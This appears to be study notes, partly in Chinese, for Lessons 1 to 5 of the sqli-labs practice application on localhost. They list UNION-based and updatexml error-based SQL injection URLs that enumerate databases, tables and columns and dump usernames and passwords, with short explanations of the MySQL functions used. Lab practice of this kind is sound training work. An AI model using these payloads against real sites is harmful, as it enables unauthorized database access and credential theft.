xhttp://localhost/sqli-labs-master/Less-1/?id=1
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=1 and 1=1-- -http://localhost/sqli-labs-master/Less-1/?id=1 and 1=2-- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=1'
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=1' order by 3-- -http://localhost/sqli-labs-master/Less-1/?id=1' order by 4-- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(username,password) from security.users -- -
xGroup_concat():会计算出那些列是一组的,将属于一组的信息显示出来Information_schema:这个库是系统默认的,只能读,它不是一个真正的库,这个数据库在5.0以上才会出现,不能对它使用insert update delete等语句Schema_name:数据库名称Schemata:存储mysql下数据库的相关信息Table_name:数据库表的名称Table_schema:这个数据表属于哪一个数据库的Column——name:字段名称Column:存储mysql下每一个数据表中所有字段名(列名)如何判断是数值型还是字符型?有引号的就是字符型 没有引号的就是数值型
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=1
xhttp://localhost/sqli-labs-master/Less-3/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-3/?id=1 and 1=2 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=1')
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=1') order by 3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,database(),3 -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,2,group_concat(username,password) from security.users -- -
xhttp://localhost/sqli-labs-master/Less-2/?id=1数值型:http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2 -- -http://localhost/sqli-labs-master/Less-2/?id=1http://localhost/sqli-labs-master/Less-2/?id=1’http://localhost/sqli-labs-master/Less-2/?id=1 order by 3 -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(username,password) from security.users -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-4/?id=1字符型:http://localhost/sqli-labs-master/Less-4/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-4/?id=1 and 1=2 -- -包裹符:http://localhost/sqli-labs-master/Less-4/?id=1"http://localhost/sqli-labs-master/Less-4/?id=1")http://localhost/sqli-labs-master/Less-4/?id=1") order by 3 -- -http://localhost/sqli-labs-master/Less-4/?id=1") order by 4 -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,3 -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,database() -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" -- -http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,2,group_concat(username,password) from security.users -- -
xxxxxxxxxxhttp://localhost/sqli-labs-master/Less-5/?id=1'http://localhost/sqli-labs-master/Less-5/?id=1 and 1=1 -- -http://localhost/sqli-labs-master/Less-5/?id=1 and 1=2 -- -http://localhost/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -报库名http://localhost/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -报表名:(第一个表的)http://localhost/sqli-labs-master/Less-5/?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- -或(获取user表的)http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) -- -报字段名称:http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' limit 0,1),0x7e),1) -- -获取用户数据:http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) -- -
xxxxxxxxxxUpdatexml(arg1,arg2,arg3)arg1:xml文档对象的名称arg2:xpath格式的字符串arg3:string格式,替换查找到的符合条件的数据Extratvalue(arg1,arg2)arg1:string格式为xml文档对象的名称arg2:xpath格式的字符串0x7e:利用xpath_string解析错误时回显报错信息的(可以用“"~"”代替)Floor(rand(0)*2)rand(0):生成一组以0开始产生的一组固定的随机数rand(0)*2:生成的随机数*2